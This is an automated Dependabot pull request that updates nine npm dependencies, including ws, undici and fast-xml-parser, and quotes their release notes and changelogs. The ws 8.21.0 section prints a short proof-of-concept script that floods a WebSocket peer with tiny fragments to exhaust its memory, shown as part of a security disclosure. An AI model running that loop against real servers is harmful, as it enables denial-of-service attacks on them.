chore(deps): bump the npm_and_yarn group across 1 directory with 9 updates

[dependabot]

Bumps the npm_and_yarn group with 2 updates in the /common/nixos/overlays/pi-coding-agent directory: @mariozechner/pi-coding-agent and brace-expansion.

Updates @mariozechner/pi-coding-agent from 0.66.1 to 0.73.1

Release notes

Sourced from @​mariozechner/pi-coding-agent's releases.

v0.73.1

New Features

• Self-update support for the npm scope migration: pi update --self now supports the upcoming package rename from @mariozechner/pi-coding-agent to @earendil-works/pi-coding-agent. After the new package is published, existing global installs can update through the normal self-update flow; pi will uninstall the old global package and install the package name returned by the version check endpoint.
• Interactive OAuth login selection: OAuth providers can now present multiple login choices in /login, enabling provider-specific interactive authentication flows. See Providers.
• JSONC-style models.json parsing: models.json now allows comments and trailing commas, making custom provider and model configuration easier to maintain. See Providers and Custom Providers.

Added

• Added interactive login selection support so OAuth providers can present multiple login choices (#4190 by @​mitsuhiko).

Changed

• Changed pi update --self to honor the active package name returned by the Pi version check endpoint, defaulting to the current package when omitted and uninstalling the old global package before installing a renamed package.
• Changed extension loading to use upstream jiti 2.7 instead of the @mariozechner/jiti fork (#4244 by @​pi0).
• Changed models.json parsing to allow comments and trailing commas (#4162 by @​julien-c).

Fixed

• Fixed pi -p treating prompts that start with YAML frontmatter as extension flags instead of user messages (#4163).
• Fixed pending tool results not updating in the live TUI after toggling thinking block visibility while the tool is running (#4167).
• Fixed /copy reporting success on Linux without writing the clipboard on Wayland-only compositors (Hyprland, Niri, ...) by skipping the X11-only native addon on Linux and routing through wl-copy/xclip/xsel instead (#4177).
• Fixed HTML session exports to strip skill wrapper XML from rendered user messages (#4234 by @​aliou).
• Fixed OpenAI-compatible chat completion streams that interleave content and tool-call deltas in the same choice.
• Fixed OpenAI Codex OAuth refresh failures writing directly to stderr while the TUI is active (#4141).
• Fixed OpenAI Codex Responses requests to send a non-empty system prompt (#4184).
• Fixed Kimi For Coding model resolution for the Kimi K2 P6 alias (#4218).
• Fixed Kitty inline image redraws to stay within TUI-owned terminal regions and avoid writing below the active viewport.
• Fixed Kitty inline image rendering by letting the terminal allocate image ids and bounding parsed image ids to valid values.
• Fixed inline image capability detection to disable inline images in cmux terminals.

v0.73.0

New Features

• Xiaomi MiMo API billing and regional Token Plan providers - xiaomi now uses API billing, with separate xiaomi-token-plan-{cn,ams,sgp} providers. See https://github.com/badlogic/pi-mono/tree/HEAD/packages/coding-agent/blob/HEAD/docs/providers.md#api-keys and https://github.com/badlogic/pi-mono/tree/HEAD/packages/coding-agent/blob/HEAD/README.md#providers--models. (#4112 by @​Phoen1xCode)
• Incremental bash output streaming - Bash tool output now appears while commands run instead of only after completion. (#4145)
• Compact read rendering - Interactive read output for Pi docs, context files, and skills is collapsed by default and shows selected line ranges.

Breaking Changes

• Switched the built-in xiaomi provider from Token Plan AMS to Xiaomi's API billing endpoint, and renamed its /login display from "Xiaomi MiMo Token Plan" to "Xiaomi MiMo". XIAOMI_API_KEY now refers to the API billing key from platform.xiaomimimo.com. Users on Token Plan should switch to the appropriate xiaomi-token-plan-* provider and set the corresponding env var (#4112 by @​Phoen1xCode).

Added

• Added three Xiaomi MiMo Token Plan regional providers visible in /login: xiaomi-token-plan-cn (XIAOMI_TOKEN_PLAN_CN_API_KEY), xiaomi-token-plan-ams (XIAOMI_TOKEN_PLAN_AMS_API_KEY), xiaomi-token-plan-sgp (XIAOMI_TOKEN_PLAN_SGP_API_KEY). Each defaults to mimo-v2.5-pro (#4112 by @​Phoen1xCode).

Changed

... (truncated)

Changelog

Sourced from @​mariozechner/pi-coding-agent's changelog.

[0.73.1] - 2026-05-07

New Features

• Self-update support for the npm scope migration: pi update --self now supports the upcoming package rename from @mariozechner/pi-coding-agent to @earendil-works/pi-coding-agent. After the new package is published, existing global installs can update through the normal self-update flow; pi will uninstall the old global package and install the package name returned by the version check endpoint.
• Interactive OAuth login selection: OAuth providers can now present multiple login choices in /login, enabling provider-specific interactive authentication flows. See Providers.
• JSONC-style models.json parsing: models.json now allows comments and trailing commas, making custom provider and model configuration easier to maintain. See Providers and Custom Providers.

Added

• Added interactive login selection support so OAuth providers can present multiple login choices (#4190 by @​mitsuhiko).

Changed

• Changed pi update --self to honor the active package name returned by the Pi version check endpoint, defaulting to the current package when omitted and uninstalling the old global package before installing a renamed package.
• Changed extension loading to use upstream jiti 2.7 instead of the @mariozechner/jiti fork (#4244 by @​pi0).
• Changed models.json parsing to allow comments and trailing commas (#4162 by @​julien-c).

Fixed

• Fixed pi -p treating prompts that start with YAML frontmatter as extension flags instead of user messages (#4163).
• Fixed pending tool results not updating in the live TUI after toggling thinking block visibility while the tool is running (#4167).
• Fixed /copy reporting success on Linux without writing the clipboard on Wayland-only compositors (Hyprland, Niri, ...) by skipping the X11-only native addon on Linux and routing through wl-copy/xclip/xsel instead (#4177).
• Fixed HTML session exports to strip skill wrapper XML from rendered user messages (#4234 by @​aliou).
• Fixed OpenAI-compatible chat completion streams that interleave content and tool-call deltas in the same choice.
• Fixed OpenAI Codex OAuth refresh failures writing directly to stderr while the TUI is active (#4141).
• Fixed OpenAI Codex Responses requests to send a non-empty system prompt (#4184).
• Fixed Kimi For Coding model resolution for the Kimi K2 P6 alias (#4218).
• Fixed Kitty inline image redraws to stay within TUI-owned terminal regions and avoid writing below the active viewport.
• Fixed Kitty inline image rendering by letting the terminal allocate image ids and bounding parsed image ids to valid values.
• Fixed inline image capability detection to disable inline images in cmux terminals.

[0.73.0] - 2026-05-04

New Features

• Xiaomi MiMo API billing and regional Token Plan providers - xiaomi now uses API billing, with separate xiaomi-token-plan-{cn,ams,sgp} providers. See https://github.com/earendil-works/pi/blob/main/packages/coding-agent/docs/providers.md#api-keys and https://github.com/earendil-works/pi/blob/main/packages/coding-agent/README.md#providers--models. (#4112 by @​Phoen1xCode)
• Incremental bash output streaming - Bash tool output now appears while commands run instead of only after completion. (#4145)
• Compact read rendering - Interactive read output for Pi docs, context files, and skills is collapsed by default and shows selected line ranges.

Breaking Changes

• Switched the built-in xiaomi provider from Token Plan AMS to Xiaomi's API billing endpoint, and renamed its /login display from "Xiaomi MiMo Token Plan" to "Xiaomi MiMo". XIAOMI_API_KEY now refers to the API billing key from platform.xiaomimimo.com. Users on Token Plan should switch to the appropriate xiaomi-token-plan-* provider and set the corresponding env var (#4112 by @​Phoen1xCode).

Added

• Added three Xiaomi MiMo Token Plan regional providers visible in /login: xiaomi-token-plan-cn (XIAOMI_TOKEN_PLAN_CN_API_KEY), xiaomi-token-plan-ams (XIAOMI_TOKEN_PLAN_AMS_API_KEY), xiaomi-token-plan-sgp (XIAOMI_TOKEN_PLAN_SGP_API_KEY). Each defaults to mimo-v2.5-pro (#4112 by @​Phoen1xCode).

Changed

... (truncated)

Commits

• 781152f Release v0.73.1
• 7fa924b docs: audit unreleased changelog entries
• 5e1e4c3 feat(coding-agent): support renamed self-update package
• 50993d7 chore(coding-agent): switch back from fork to upstream jiti 2.7 (#4244)
• 8861966 fix(coding-agent): strip skill wrapper XML from HTML export user messages (#4...
• 060c10b fix(coding-agent): skip X11-only native addon for /copy on Linux
• 755da30 fix(coding-agent): keep pending tool renders after thinking toggle
• b5755fd feat(oauth): support interactive login selection (#4190)
• bb25a39 feat(coding-agent): allow comments and trailing commas in models.json (#4162)
• bac2df3 fix(coding-agent): handle frontmatter prompts in print mode
• Additional commits viewable in compare view

Updates basic-ftp from 5.2.2 to 5.3.1

Release notes

Sourced from basic-ftp's releases.

5.3.1

• Fixed: Protect against unbounded control response, fixes GHSA-rpmf-866q-6p89.

5.3.0

• Changed: Introduced an upper bound for total bytes of directory listing, fixes GHSA-rp42-5vxx-qpwr.
• Added: Option to increase the upper bound for total bytes of directory listing in Client constructor.

Changelog

Sourced from basic-ftp's changelog.

5.3.1

• Fixed: Protect against unbounded control response, fixes GHSA-rpmf-866q-6p89.

5.3.0

• Changed: Introduced an upper bound for total bytes of directory listing, fixes GHSA-rp42-5vxx-qpwr.
• Added: Option to increase the upper bound for total bytes of directory listing in Client constructor.

Commits

• 980371b Guard against unbounded control response
• 50827c7 Adjust changelog to match release notes
• c9378a8 Fix test
• 22abe43 Update Github Actions
• 0feaaec Fix test
• 6629d7d Improve error message
• 9c3bf4f Set higher default value for max size of directory listing
• acd3942 Bump version
• 1304429 Offer maxListingBytes as an option
• 5cb5367 Add bounded StringWriter
• Additional commits viewable in compare view

Updates brace-expansion from 5.0.5 to 5.0.6

Commits

• 46317b5 5.0.6
• c0b095b Merge commit from fork
• ec56020 Bump picomatch from 4.0.3 to 4.0.4 (#93)
• See full diff in compare view

Updates fast-xml-builder from 1.1.4 to 1.2.0

Changelog

Sourced from fast-xml-builder's changelog.

1.2.0 (2026-05-08)

• Add support for sanitizeName option
• Support xml-naming for validating and sanitizing tag and attribute names

1.1.9 (2026-05-06)

• fix: format output for preserve order when indent by is set to empty string

1.1.8 (2026-05-05)

• fix: skip text property for PI tags
• improve typings

1.1.7 (2026--05-04)

• fix security issues when attribute value contains quotes

1.1.6 (2026--05-04)

• fix security issues related to comment
• skip comment with null value

1.1.5 (2026-04-17)

• fix security issues related to comment and cdata

1.1.4 (2026-03-16)

• support maxNestedTags option

1.1.3 (2026-03-13)

• declare Matcher & Expression as unknown so user is not forced to install path-expression-matcher

1.1.2 (2026-03-11)

• fix typings

1.1.1 (2026-03-11)

• upgrade path-expression-matcher to 1.1.3

1.1.0 (2026-03-10)

• Integrate path-expression-matcher

Commits

• a9a905b for release
• 42680e8 support name sanitization
• 8b00185 release info
• 8a08f17 allow indentation to be empty string
• 7fc5dec update docs
• c241b6a improve documentation
• 15d5668 update for release
• 9877485 fix: skip text property for PI tags
• 311a221 fix #5 typing import issues
• e8fc5b1 update for releast
• Additional commits viewable in compare view

Updates fast-xml-parser from 5.5.8 to 5.7.3

Release notes

Sourced from fast-xml-parser's releases.

fix minor old bugs and update builder

• fix: alwaysCreateTextNode should create text node when attributes are present for self closing node
• fix stop node expression when ns prefix is removed (found by iruizsalinas)
• update XML Builder to 1.1.7
• mark addEntity deprecated

backward compatibility for numerical external entity, fix #705, #817

• allow numerical external entity for backward compatibility
• fix #705: attributesGroupName working with preserveOrder
• fix #817: stackoverflow when tag expression is very long

upgrade @​nodable/entities and FXB

• Use @nodable/entities v2.1.0
  • breaking changes
    • single entity scan. You're not allowed to use entity value to form another entity name.
    • you cant add numeric external entity
    • entity error message when expantion limit is crossed might change
  • typings are updated for new options related to process entity
  • please follow documentation of @nodable/entities for more detail.
  • performance
    • if processEntities is false, then there should not be impact on performance.
    • if processEntities is true, but you dont pass entity decoder separately then performance may degrade by approx 8-10%
    • if processEntities is true, and you pass entity decoder separately
      • if no entity then performance should be same as before
      • if there are entities then performance should be increased from past versions
  • ignoreAttributes is not required to be set to set xml version for NCR entity value
• update 'fast-xml-builder' to sanitize malicious CDATA and comment's content

use @​nodable/entities to replace entities

• No API change
• No change in performance for basic usage
• No typing change
• No config change
• new dependency
• breaking: error messages for entities might have been changed.

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.12...v5.6.0

performance improvment, increase entity expansion default limit

• increase default entity explansion limit as many projects demand for that

maxEntitySize: 10000,
maxExpansionDepth: 10000,
maxTotalExpansions: Infinity,
maxExpandedLength: 100000,
maxEntityCount: 1000,

• performance improvement
  • reduce calls to toString
  • early return when entities are not present

... (truncated)

Changelog

Sourced from fast-xml-parser's changelog.

Note: If you find missing information about particular minor version, that version must have been changed without any functional change in this library.

Note: Due to some last quick changes on v4, detail of v4.5.3 & v4.5.4 are not updated here. v4.5.4x is the last tag of v4 in github repository. I'm extremely sorry for the confusion

*5.9.3 / 2026-06-19

• update strnum

*5.9.2 / 2026-06-17

• dummy release to test changes in github action

*5.9.1 / 2026-06-17

• dummy release to test release from github action

*5.9.0 / 2026-06-15

• update strnum to 2.3.0
  • you can set hex, binary, enotation, infinity, unicode
• validate unsafe HTML or XML data in doctype entities unsing 'is-unsafe' library. User can override rules by overriding EntityDecoder.

*5.8.0 / 2026-05-12

• integrate xml-naming to validate DOCTYPE entity name and notation name (using qname becaue of backward compatibility)
  • This will consider xml-version as well. '1.0' is default
• update strnum to 2.3.0
  • You can set octal and binary parsing which is bydeault off
• update fast-xml-builder to 1.2.0
  • can sanitize tag names if found invalid
  • fix format output

5.7.3 / 2006-05-05

• fix: alwaysCreateTextNode should create text node when attributes are present for self closing node
• fix stop node expression when ns prefix is removed (found by iruizsalinas)
• update XML Builder to 1.1.7
• mark addEntity deprecated

5.7.2 / 2026-04-25

• allow numerical external entity for backward compatibility
• fix #705: attributesGroupName working with preserveOrder
• fix #817: stackoverflow when tag expression is very long

5.7.1 / 2026-04-20

• fix typo in CJS typing file

5.7.0 / 2026-04-17

• Use @nodable/entities v2.1.0
  • breaking changes
    • single entity scan. You're not allowed to user entity value to form another entity name.
    • you cant add numeric external entity
    • entity error message when expantion limit is crossed might change

... (truncated)

Commits

• d6d8042 update to release
• d263370 remove dev dependency 'he'
• f9c9a2c update builder to 1.1.7
• b65da87 update changelog and mark addEntity deprecated
• c2ca631 update fxb
• da75191 fix stop node expression when ns prefix is removed
• 31bbc99 fix: alwaysCreateTextNode should create text node when attributes are present...
• dab327a remove unnecessary
• ab04eeb update docs
• 383cb3f Revise security information for v6 release
• Additional commits viewable in compare view

Updates ip-address from 10.1.0 to 10.2.0

Commits

• 80fccaa 10.2.0
• abaeb4d Type Address4.addressMinusSuffix as non-nilable (closes #143)
• 2878c29 Preserve subnet prefix through Address6.to4() (closes #123) (#203)
• 586666e Reject trailing junk in Address6.fromURL (closes #158) (#202)
• 80bc76e Validate static factories instead of silently overflowing (#201)
• 98927be Clarify isValid() accepts CIDRs with host bits set (#81)
• a0eb073 Fix getScope() and broaden getType() classification (closes #122) (#200)
• ec52105 Add networkForm() for CIDR network-address strings (#199)
• a9443a7 Add isMapped4() predicate for IPv4-mapped IPv6 addresses (closes #62) (#198)
• f01d742 Add address-property predicates (private, ULA, loopback, link-local, etc.) (#...
• Additional commits viewable in compare view

Updates protobufjs from 7.5.4 to 7.6.4

Release notes

Sourced from protobufjs's releases.

protobufjs: v7.6.4

7.6.4 (2026-06-12)

Bug Fixes

• Reconfigure and speed up CI (#2329) (574f761)
• Remove inquire submodule (#2327) (06ddd07)

protobufjs: v7.6.3

7.6.3 (2026-06-09)

Bug Fixes

• Avoid name collisions in generated code (#2311) (78a9576)
• Preserve null conversion behavior for fieldless messages (#2312) (df91652)

protobufjs: v7.6.2

7.6.2 (2026-05-30)

Bug Fixes

• Backport consistency and correctness fixes (#2294) (a92f72e)

protobufjs: v7.6.1

7.6.1 (2026-05-22)

Bug Fixes

• Backport misc utility hardening (#2280) (8a45c13)
• Treat fixed64 as unsigned in converters (#2266) (479dfdc)

protobufjs: v7.6.0

7.6.0 (2026-05-18)

Features

• Support BigInt conversions (7.x) (#2258) (f769242)

protobufjs: v7.5.9

7.5.9 (2026-05-17)

Bug Fixes

• Backport bundler-safe optional module lookups (#2254) (0853a62)

... (truncated)

Changelog

Sourced from protobufjs's changelog.

7.6.4 (2026-06-12)

Bug Fixes

• Reconfigure and speed up CI (#2329) (574f761)
• Remove inquire submodule (#2327) (06ddd07)

7.6.3 (2026-06-09)

Bug Fixes

• Avoid name collisions in generated code (#2311) (78a9576)
• Preserve null conversion behavior for fieldless messages (#2312) (df91652)

7.6.2 (2026-05-30)

Bug Fixes

• Backport consistency and correctness fixes (#2294) (a92f72e)

7.6.1 (2026-05-22)

Bug Fixes

• Backport misc utility hardening (#2280) (8a45c13)
• Treat fixed64 as unsigned in converters (#2266) (479dfdc)

7.6.0 (2026-05-18)

Features

• Support BigInt conversions (7.x) (#2258) (f769242)

7.5.9 (2026-05-17)

Bug Fixes

• Backport bundler-safe optional module lookups (#2254) (0853a62)

7.5.8 (2026-05-12)

Bug Fixes

... (truncated)

Commits

• f8f64ef chore: release protobufjs-v7.x (#2330)
• 574f761 fix: Reconfigure and speed up CI (#2329)
• 06ddd07 fix: Remove inquire submodule (#2327)
• 1d3796d chore: release protobufjs-v7.x (#2317)
• df91652 fix: Preserve null conversion behavior for fieldless messages (#2312)
• 78a9576 fix: Avoid name collisions in generated code (#2311)
• ec90ef9 chore: release protobufjs-v7.x (#2295)
• a92f72e fix: Backport consistency and correctness fixes (#2294)
• f0b50d2 chore: release protobufjs-v7.x (#2268)
• 8a45c13 fix: Backport misc utility hardening (#2280)
• Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for protobufjs since your current version.

Updates undici from 7.24.7 to 7.28.0

Release notes

Sourced from undici's releases.

v7.28.0

⚠️ Security Release

This release line addresses 7 security advisories, all shipped in v7.28.0.

Action required: Upgrade to undici 7.28.0 or later.

npm install undici@^7.28.0

The v7 line is not affected by GHSA-38rv-x7px-6hhq (CVE-2026-9675), which is an 8.x-only regression.

Note on GHSA-hm92-r4w5-c3mj: this fix shipped in v7.28.0, not the earlier 7.2x line — the vulnerable single-pool code was still present through v7.27.2. The per-origin pool fix is 3805b8f8 (#5041).

Summary

Advisory	CVE	Severity (CVSS)	Fixed in	Fix commit
GHSA-vxpw-j846-p89q	CVE-2026-12151	High (7.5)	7.28.0	8cb10f98
GHSA-vmh5-mc38-953g	CVE-2026-9697	High (7.4)	7.28.0	04201f89
GHSA-hm92-r4w5-c3mj	CVE-2026-6734	High (7.5)	7.28.0	3805b8f8
GHSA-pr7r-676h-xcf6	CVE-2026-9678	Moderate (5.9)	7.28.0	85a24055
GHSA-p88m-4jfj-68fv	CVE-2026-9679	Moderate (5.9)	7.28.0	d0574cc4
GHSA-g8m3-5g58-fq7m	CVE-2026-11525	Low (3.7)	7.28.0	d0574cc4
GHSA-35p6-xmwp-9g52	CVE-2026-6733	Low (3.7)	7.28.0	ea8930cf

---

High severity

WebSocket DoS via fragment count bypass — CVE-2026-12151

GHSA-vxpw-j846-p89q · CWE-400, CWE-770 Fix: 8cb10f98 websocket: limit the number of fragments in a message (part of backport a027a4a0 Backport WebSocket maxPayloadSize fixes to v7.x, #5423)

A malicious WebSocket server can stream a large number of small or empty continuation frames. Undici enforced a limit on cumulative payload size but did not limit the number of fragments per message, leading to unbounded memory growth and denial of service.

• Affected: applications using new WebSocket(...) or WebSocketStream against untrusted endpoints.
• Workaround: none — upgrade is required.

TLS certificate validation bypass in SOCKS5 ProxyAgent — CVE-2026-9697

GHSA-vmh5-mc38-953g · CWE-295

... (truncated)

Commits

• f9eba0a Bumped v7.28.0 (#5430)
• a027a4a Backport WebSocket maxPayloadSize fixes to v7.x (#5423)
• 8cb10f9 websocket: limit the number of fragments in a message
• 04201f8 fix: honor requestTls when proxy is SOCKS5
• fcd642f fix(socks5): preserve dispatch backpressure return value (#5166)
• bc98c97 fix(socks5): use configured connector in Socks5ProxyAgent (#5168)
• 9e1c743 fix(socks5): encode embedded IPv4 tails in IPv6 literals correctly (#5099)
• 376c8be fix(socks5): enforce authenticated state before CONNECT (#5097)
• 3805b8f fix(socks5-proxy-agent): use per-origin pools to prevent cross-origin routing...
• 85a2405 fix(cache): trim qualified field names
• Additional commits viewable in compare view

Updates ws from 8.20.0 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

• Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

• Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

8.20.1

... (truncated)

Commits

• bca91ad [dist] 8.21.0
• 2b2abd4 [security] Limit retained message parts
• 78eabe2 [security] Add latest vulnerability to SECURITY.md
• 5d9b316 [dist] 8.20.1
• c0327ec [security] Fix uninitialized memory disclosure in websocket.close()
• ce2a3d6 [ci] Test on node 26
• 58e45b8 [ci] Do not test on node 25
• 5f26c24 [ci] Run the lint step on node 24
• See full diff in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

• @dependabot rebase will rebase this PR
• @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
• @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
• @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
• @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
• @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
• @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
• @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
  You can disable automated security fix PRs for this repo from the Security Alerts page.